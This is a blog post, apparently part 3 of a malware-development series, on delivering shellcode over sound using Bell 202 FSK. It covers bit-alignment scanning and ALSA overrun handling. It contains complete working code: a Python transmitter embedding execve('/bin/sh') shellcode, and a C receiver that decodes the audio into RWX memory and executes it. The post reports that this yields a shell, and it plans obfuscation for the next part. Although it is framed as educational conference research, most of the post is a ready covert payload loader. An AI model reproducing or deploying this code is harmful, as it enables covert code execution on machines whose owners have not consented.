Malware shellcode delivery via signal - part 3. Fix straddling, ALSA buffer overrun, and sub-bit alignment. Simple python and C examples

13 minute read

﷽

Hello, cybersecurity enthusiasts and white hackers!

malware

In part 2, we formalized our acoustic protocol. It looked great on paper, but the moment we move from a virtual loopback to a real-world environment with a physical microphone and speakers, the reliability drops to near zero.

Why? Two compounding problems. Today, we fix both and turn our receiver into a reliable DSP tool.

problem 1: bit straddling. Our protocol uses 300 baud at 48.000 Hz, giving us exactly 160 samples per bit (SPB). The assumption in a naive implementation is that the first sample we read from the microphone is also the first sample of a bit. But the transmitter starts playing whenever it wants - our CPU and sound card are not perfectly synced. If our 160-sample Goertzel window starts at sample 80, it sees 50% of Bit N and 50% of Bit N+1. The energy of both 1200Hz and 2200Hz gets “smeared,” leading to corrupted bits and checksum failures.

To solve this without complex Phase-Locked Loops (PLL), we implement sub-bit offset scanning. Instead of processing the audio once, we record a 6-second block and process it 16 times, shifting the starting point by 10 samples each time.

problem 2: ALSA buffer overrun (EPIPE). Part 2’s receiver captured audio with a single call:

snd_pcm_readi(h, buf, 288000); // 6 seconds = 288,000 samples in one shot

ALSA’s internal ring buffer is only a few hundred milliseconds deep. Asking for 6 seconds of audio in one blocking call almost guarantees an overrun - ALSA’s ring buffer fills up and wraps around before we drain it. When EPIPE fires, snd_pcm_readi returns an error code. Part 2 ignores the return value entirely, so buf is silently left full of zeros or stale data. The Goertzel decoder runs on garbage, and the checksum always fails. No error is ever printed.

The core change is the Brute-force alignment loop. The main function now acts as a coordinator. It captures the sound once and then “punches” through it with different offsets.

#define N_OFFSETS    16           // try 16 different alignments
#define OFFSET_STEP  (SPB / N_OFFSETS) // shift by 10 samples each time

for (int t = 0; t < N_OFFSETS; t++) {
  int offset = t * OFFSET_STEP; 
  // try_offset will attempt to find a valid preamble at this specific offset
  if (try_offset(audio_buffer, total_samples, offset)) {
    printf("[=^..^=] victory! alignment found at offset %d\n", offset);
    return 0;
  }
}

The try_offset function doesn’t just “listen” - it reconstructs the entire bitstream from a specific starting point. If the 40-bit preamble matches and the XOR checksum is valid, we know we’ve found the bit grid:

// logic inside try_offset
for (int i = 0; i < n_bits; i++) {
  // we start processing exactly at 'audio + offset'
  double pm = goertzel(audio + offset + i * SPB, SPB, FREQ_MARK);
  double ps = goertzel(audio + offset + i * SPB, SPB, FREQ_SPACE);
  bits[i] = (pm > ps) ? 1 : 0;
}

In the second part, the checksum was simply a check. In the third part now, it’s an indicator of brute force success. If the checksum doesn’t match, we don’t fail with an error, we simply move on to the next offset.

practical example

The part 2 receiver captures the full 6-second audio buffer with one call and ignores the return value:

int total = CAPTURE_SECS * SAMPLE_RATE;   // 288,000 samples
int16_t *buf = malloc(total * sizeof(int16_t));
printf("[=^..^=] listening for 6 seconds...\n");
snd_pcm_readi(h, buf, total);             // return value discarded
snd_pcm_close(h);

If ALSA’s ring buffer overruns during those 6 seconds, snd_pcm_readi returns -EPIPE. Because the return value is never checked, the code proceeds to run the Goertzel decoder on an uninitialized or zeroed buffer. The checksum always fails, and no error is ever shown.

so, how can we fix this in this part? First of all, capture_audio() reads in small 0.1-second chunks (4800 samples). If EPIPE fires, it calls snd_pcm_prepare() to reset the device and retries immediately. This ensures the buffer is always fully and correctly filled before decoding begins:

static int16_t *capture_audio(snd_pcm_t *h, int *out_samples) {
  int total = CAPTURE_SECS * SAMPLE_RATE;
  int16_t *buf = malloc((size_t)total * sizeof(int16_t));

  int got = 0;
  while (got < total) {
    int want = total - got;
    if (want > 4800) want = 4800;          /* 0.1 s chunks */
    int rc = snd_pcm_readi(h, buf + got, (snd_pcm_uframes_t)want);
    if (rc == -EPIPE) { snd_pcm_prepare(h); continue; }  /* recover overrun */
    if (rc < 0) {
      fprintf(stderr, "[=^..^=] read error: %s\n", snd_strerror(rc));
      free(buf); return NULL;
    }
    got += rc;
  }
  *out_samples = got;
  return buf;
}

Only after a full, verified capture does the receiver run the 16-offset Goertzel scan. The two fixes together - reliable capture and sub-bit alignment scanning - are what make the receiver work in the real world.

So, full source code for transmission logic is looks like the following transmit_live.py:

#!/usr/bin/env python3
"""
transmit_live.py
acoustic shellcode transmitter - part 1: live visualization
author: @cocomelonc
"""
import time
import struct
import numpy as np
import sounddevice as sd
import matplotlib.pyplot as plt

# protocol constants (must match receiver.c exactly)
SAMPLE_RATE  = 48000
BAUD_RATE    = 300
FREQ_MARK    = 2200          # bit 1 (high)
FREQ_SPACE   = 1200          # bit 0 (low)
SPB          = SAMPLE_RATE // BAUD_RATE # 160 samples per bit
PREAMBLE     = bytes([0xAA, 0xAA, 0xAA, 0xAA, 0x7E])

# visualization constants
WINDOW_BITS  = 24            # how many bits to show in the sliding window
WINDOW_SAMPS = SPB * WINDOW_BITS
TARGET_FPS   = 30            # smooth animation

# linux x86_64 execve("/bin/sh")
SHELLCODE = bytes([
    0x48, 0x31, 0xc0, 0x50, 0x48, 0xbb, 0x2f, 0x62, 0x69, 0x6e, 
    0x2f, 0x2f, 0x73, 0x68, 0x53, 0x48, 0x89, 0xe7, 0x50, 0x57, 
    0x48, 0x89, 0xe6, 0x48, 0x31, 0xd2, 0xb0, 0x3b, 0x0f, 0x05
])

def build_frame(payload):
    """wraps payload in: preamble + 2-byte big-endian length + payload + XOR checksum.
    this is the wire format that receiver.c expects."""
    cksum = 0
    for b in payload:
        cksum ^= b
    return PREAMBLE + struct.pack('>H', len(payload)) + payload + bytes([cksum])

def generate_tone(bit):
    """generates a sine wave for a single bit."""
    freq = FREQ_MARK if bit else FREQ_SPACE
    t = np.arange(SPB) / SAMPLE_RATE
    return np.sin(2 * np.pi * freq * t).astype(np.float32)

def byte_to_signal(byte):
    """converts a single byte into an audio signal."""
    return np.concatenate([generate_tone((byte >> i) & 1) for i in range(8)])

def build_figure():
    """sets up the matplotlib figure for live plotting."""
    plt.style.use('dark_background')
    fig, (ax_wave, ax_spec) = plt.subplots(2, 1, figsize=(12, 6))
    fig.suptitle('[=^..^=] live acoustic transmission', color='#00ff88')
    
    # waveform plot setup
    line_wave, = ax_wave.plot(np.arange(WINDOW_SAMPS), np.zeros(WINDOW_SAMPS), color='#00ffff', lw=1)
    ax_wave.set_ylim(-1.2, 1.2)
    ax_wave.set_axis_off()
    
    # spectrum plot setup (FFT)
    freqs = np.fft.rfftfreq(WINDOW_SAMPS, d=1.0/SAMPLE_RATE)
    line_spec, = ax_spec.plot(freqs, np.zeros(len(freqs)), color='#ffaa00', lw=1.5)
    ax_spec.set_xlim(0, 4000)
    ax_spec.set_ylim(0, 1)
    ax_spec.set_xlabel('frequency (Hz)')
    ax_spec.set_ylabel('magnitude')
    
    plt.tight_layout()
    return fig, line_wave, line_spec

def transmit_live(payload):
    # build framed signal: preamble + length + payload + checksum
    frame  = build_frame(payload)
    body   = np.concatenate([byte_to_signal(b) for b in frame])
    lead   = np.zeros(int(SAMPLE_RATE * 0.5), dtype=np.float32)
    signal = np.concatenate([lead, body, lead])
    total_samples = len(signal)

    cksum = 0
    for b in payload: cksum ^= b
    print(f"[=^..^=] shellcode : {len(payload)} bytes")
    print(f"[=^..^=] frame     : {len(frame)} bytes  ({len(frame)*8} bits)")
    print(f"[=^..^=] checksum  : 0x{cksum:02x}")
    print(f"[=^..^=] duration  : {total_samples/SAMPLE_RATE:.2f} s")

    # setup visualization
    fig, line_wave, line_spec = build_figure()
    plt.ion() # interactive mode ON
    plt.show()

    # start audio in background
    print("[=^..^=] transmitting...")
    sd.play(signal, SAMPLE_RATE)
    start_time = time.perf_counter()

    # live plot loop
    while True:
        elapsed = time.perf_counter() - start_time
        current_sample = int(elapsed * SAMPLE_RATE)
        
        if current_sample >= total_samples:
            break
            
        # sliding window logic
        start = max(0, current_sample - WINDOW_SAMPS // 2)
        end = start + WINDOW_SAMPS
        
        if end > total_samples:
            end = total_samples
            start = end - WINDOW_SAMPS

        window = signal[start:end]
        
        # update waveform
        line_wave.set_ydata(window)
        
        # update spectrum (FFT)
        mag = np.abs(np.fft.rfft(window))
        if mag.max() > 0: mag /= mag.max() # normalize
        line_spec.set_ydata(mag)

        fig.canvas.draw_idle()
        plt.pause(1/TARGET_FPS)

    sd.wait()
    plt.ioff() # interactive mode OFF
    print("[=^..^=] done.")
    plt.show()

if __name__ == "__main__":
    transmit_live(SHELLCODE)

and for receiver.c:

/*
 * receiver.c
 * real-time FSK acoustic shellcode receiver (Linux / ALSA)
 * author :  @cocomelonc
 */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>
#include <math.h>
#include <sys/mman.h>
#include <alsa/asoundlib.h>

// Bell 202 and DSP Constants
#define PI          3.14159265358979323846
#define SAMPLE_RATE 48000
#define BAUD_RATE   300
#define FREQ_MARK   2200          // bit 1 - high tone
#define FREQ_SPACE  1200          // bit 0 - low tone
#define SPB         (SAMPLE_RATE / BAUD_RATE)   // 160 samples per bit

// brute-force params
#define CAPTURE_SECS  6                // record this many seconds of audio
#define N_OFFSETS    16                // alignment tries per bit period   
#define OFFSET_STEP  (SPB / N_OFFSETS) // 10 samples per step

// frame preamble for synchronization
static const uint8_t PREAMBLE[] = {0xAA, 0xAA, 0xAA, 0xAA, 0x7E};
#define PREAMBLE_LEN  5
#define PREAMBLE_BITS (PREAMBLE_LEN * 8)        // 40 bits

// Goertzel algorithm: detects the magnitude of a specific frequency in a block of samples
static double goertzel(const int16_t *s, int n, double freq) {
  double omega = 2.0 * PI * freq / (double)SAMPLE_RATE;
  double coeff = 2.0 * cos(omega);
  double q1 = 0.0, q2 = 0.0, q0;
  for (int i = 0; i < n; i++) {
    q0 = coeff * q1 - q2 + (double)s[i] / 32768.0;
    q2 = q1;
    q1 = q0;
  }
  return q1 * q1 + q2 * q2 - coeff * q1 * q2;
}

// ALSA: open and configure capture device
static snd_pcm_t *open_capture(const char *device) {
  snd_pcm_t *h;
  int rc = snd_pcm_open(&h, device, SND_PCM_STREAM_CAPTURE, 0);
  if (rc < 0) {
    fprintf(stderr, "[=^..^=] cannot open '%s': %s\n", device, snd_strerror(rc));
    return NULL;
  }
  rc = snd_pcm_set_params(h,
    SND_PCM_FORMAT_S16_LE,
    SND_PCM_ACCESS_RW_INTERLEAVED,
    1, SAMPLE_RATE, 1, 100000);
  if (rc < 0) {
    fprintf(stderr, "[=^..^=] set_params failed: %s\n", snd_strerror(rc));
    snd_pcm_close(h);
    return NULL;
  }
  return h;
}

// capture CAPTURE_SECS seconds into a heap buffer
static int16_t *capture_audio(snd_pcm_t *h, int *out_samples) {
  int total = CAPTURE_SECS * SAMPLE_RATE;
  int16_t *buf = malloc((size_t)total * sizeof(int16_t));
  if (!buf) { fprintf(stderr, "[=^..^=] OOM\n"); return NULL; }

  int got = 0, prev_sec = CAPTURE_SECS + 1;
  while (got < total) {
    int want = total - got;
    if (want > 4800) want = 4800;   /* 0.1 s chunks */
    int rc = snd_pcm_readi(h, buf + got, (snd_pcm_uframes_t)want);
    if (rc == -EPIPE) { snd_pcm_prepare(h); continue; }
    if (rc < 0) {
      fprintf(stderr, "\n[=^..^=] read error: %s\n", snd_strerror(rc));
      free(buf);
      return NULL;
    }
    got += rc;
    int secs_left = CAPTURE_SECS - got / SAMPLE_RATE;
    if (secs_left != prev_sec) {
      prev_sec = secs_left;
      printf("\r[=^..^=] listening... %2d s remaining   ", secs_left);
      fflush(stdout);
    }
  }
  printf("\r[=^..^=] capture complete - %d samples (%d s)          \n\n",
         got, CAPTURE_SECS);
  *out_samples = got;
  return buf;
}

// bit extraction: 8 bits LSB-first from a flat bit array
static uint8_t get_byte(const uint8_t *bits, int bit_offset) {
  uint8_t res = 0;
  for (int i = 0; i < 8; i++)
    if (bits[bit_offset + i]) res |= (uint8_t)(1u << i);
  return res;
}

// demodulate at a given sample offset -> allocated bit array
static uint8_t *demodulate(const int16_t *audio, int n_samples,
                            int offset, int *out_bits) {
  int usable = n_samples - offset;
  int n_bits  = usable / SPB;
  if (n_bits <= 0) { *out_bits = 0; return NULL; }

  uint8_t *bits = malloc((size_t)n_bits);
  if (!bits) { *out_bits = 0; return NULL; }

  const int16_t *p = audio + offset;
  for (int i = 0; i < n_bits; i++) {
    double pm = goertzel(p + i * SPB, SPB, FREQ_MARK);
    double ps = goertzel(p + i * SPB, SPB, FREQ_SPACE);
    bits[i]   = (pm > ps) ? 1 : 0;
  }
  *out_bits = n_bits;
  return bits;
}

// ASCII progress bar
static void progress(int done, int total) {
  int w = 40, filled = total ? done * w / total : 0;
  printf("\r[=^..^=] receiving  [");
  for (int i = 0; i < w; i++) putchar(i < filled ? '#' : '.');
  printf("]  %d / %d bytes", done, total);
  fflush(stdout);
}

// try one sample offset; returns 1 and executes on success
static int try_offset(const int16_t *audio, int n_samples, int offset) {
  int n_bits = 0;
  uint8_t *bits = demodulate(audio, n_samples, offset, &n_bits);
  if (!bits) return 0;

  // scan for preamble; need at least preamble + 2B length + 1B checksum
  int limit    = n_bits - PREAMBLE_BITS - 24;
  int pre_bit  = -1;
  for (int i = 0; i < limit; i++) {
    int match = 1;
    for (int b = 0; b < PREAMBLE_LEN && match; b++) {
      if (get_byte(bits, i + b * 8) != PREAMBLE[b]) match = 0;
    }
    if (match) { pre_bit = i; break; }
  }

  if (pre_bit < 0) {
    printf("[=^..^=] offset %3d: preamble not found\n", offset);
    free(bits);
    return 0;
  }

  printf("[=^..^=] offset %3d: preamble at bit %d - decoding...\n",
         offset, pre_bit);

  int cursor = pre_bit + PREAMBLE_BITS;

  // 2-byte big-endian length
  if (cursor + 16 > n_bits) {
    printf("[=^..^=] offset %3d: truncated after preamble\n", offset);
    free(bits); return 0;
  }
  uint8_t l1 = get_byte(bits, cursor); cursor += 8;
  uint8_t l2 = get_byte(bits, cursor); cursor += 8;
  uint16_t pay_len = ((uint16_t)l1 << 8) | l2;

  if (pay_len == 0 || cursor + ((int)pay_len + 1) * 8 > n_bits) {
    printf("[=^..^=] offset %3d: length %u implausible or out of range\n",
           offset, pay_len);
    free(bits); return 0;
  }

  uint8_t *payload = malloc(pay_len);
  if (!payload) { free(bits); return 0; }

  uint8_t cksum_calc = 0;
  for (int i = 0; i < (int)pay_len; i++) {
    payload[i]  = get_byte(bits, cursor);
    cksum_calc ^= payload[i];
    cursor += 8;
    progress(i + 1, pay_len);
  }
  printf("\n");

  uint8_t cksum_rx = get_byte(bits, cursor);
  free(bits);

  if (cksum_calc != cksum_rx) {
    printf("[=^..^=] offset %3d: checksum FAIL  calc=0x%02x  rx=0x%02x\n",
           offset, cksum_calc, cksum_rx);
    free(payload);
    return 0;
  }

  printf("[=^..^=] offset %3d: checksum OK (0x%02x)\n", offset, cksum_rx);
  printf("[=^..^=] payload length : %u bytes\n\n", pay_len);

  printf("[=^..^=] shellcode recovered (%u bytes):\n", pay_len);
  for (int i = 0; i < (int)pay_len; i++) {
    printf("%02x ", payload[i]);
    if ((i + 1) % 16 == 0) printf("\n");
  }
  if (pay_len % 16 != 0) printf("\n");
  printf("\n");

  void *mem = mmap(NULL, pay_len,
                   PROT_READ | PROT_WRITE | PROT_EXEC,
                   MAP_ANON | MAP_PRIVATE, -1, 0);
  if (mem == MAP_FAILED) {
    perror("[=^..^=] mmap");
    free(payload);
    return 0;
  }

  memcpy(mem, payload, pay_len);
  free(payload);

  printf("[=^..^=] jumping to shellcode...  =^..^=\n");
  ((void(*)())mem)();

  munmap(mem, pay_len);
  return 1;
}

// main
int main(int argc, char **argv) {
  const char *device = (argc > 1) ? argv[1] : "default";
  printf("[=^..^=] receiver  Bell 202 FSK  %d/%d Hz  %d baud  %d kHz\n",
         FREQ_MARK, FREQ_SPACE, BAUD_RATE, SAMPLE_RATE / 1000);
  printf("[=^..^=] capture device : %s\n", device);
  printf("[=^..^=] SPB            : %d samples per bit\n", SPB);
  printf("[=^..^=] strategy       : batch capture + %d alignment offsets\n\n",
         N_OFFSETS);

  snd_pcm_t *handle = open_capture(device);
  if (!handle) return 1;

  int n_samples = 0;
  int16_t *audio = capture_audio(handle, &n_samples);
  snd_pcm_close(handle);
  if (!audio) return 1;

  printf("[=^..^=] scanning %d alignment offsets (step = %d samples)...\n\n",
         N_OFFSETS, OFFSET_STEP);

  for (int t = 0; t < N_OFFSETS; t++) {
    int offset = t * OFFSET_STEP;
    if (try_offset(audio, n_samples, offset)) {
      free(audio);
      return 0;
    }
  }

  free(audio);
  printf("\n[=^..^=] no valid frame found in %d s of audio\n", CAPTURE_SECS);
  printf("transmitter: python3 transmit_live.py (device: hw:Loopback,0,0)\n");
  return 1;
}

demo

Let’s see this in action. Compile receiver:

gcc receiver.c -o receiver -lasound -lm

malware

Then, run it:

./receiver

malware

Then, run transmitting logic (for simplicity, same device first):

python3 transmit_live.py

malware

Finally, we got our shell:

malware

try it without transmission:

./receiver

malware

And for two devices:

malware

As you can see, perfectly works as expected! =^..^=

conclusion

In the next part, we will add a mathematical obfuscation layer on top of the working protocol we built here. The shellcode will never travel as raw bytes. Instead, we apply a Forward Discrete Fourier Transform with a secret phase shift - the raw bytes become complex frequency coefficients that look like noise to any observer. The receiver applies the Inverse DFT with the same key to reconstruct the original shellcode just before execution.

We will also show another example (just as case), if we need to switch from a live microphone to a WAV file as the transport medium. This removes all the ALSA capture complexity - the receiver simply reads payload.wav, runs Goertzel demodulation on the known-good samples, and recovers the shellcode. No alignment scan required, no EPIPE to handle. A clean controlled channel - which will make it straightforward to demonstrate on both Linux and Windows.

This series of posts is based on my research and the results that I first presented at the BSides Prishtina 2026 conference. If I make significant progress in this research, I may also present my findings at other conferences.

malware

FSK
Bell 202 standard
Discrete Fourier Transform (DFT)
Goertzel Algorithm
source code in github

This is a practical case for educational purposes only.

Thanks for your time happy hacking and good bye!
PS. All drawings and screenshots are mine

Share on

Twitter Facebook LinkedIn

cocomelonc

Malware shellcode delivery via signal - part 3. Fix straddling, ALSA buffer overrun, and sub-bit alignment. Simple python and C examples

practical example

demo

conclusion

Share on

You may also enjoy

Malware development trick 61: Module stomping. Simple C example

Malware analysis: part 11. How to create your own mini-GPT for binary analysis.

Malware development trick 60: Function stomping (remote process). Simple C example

Malware and cryptography 45 - Shamir Secret Sharing. Simple C example.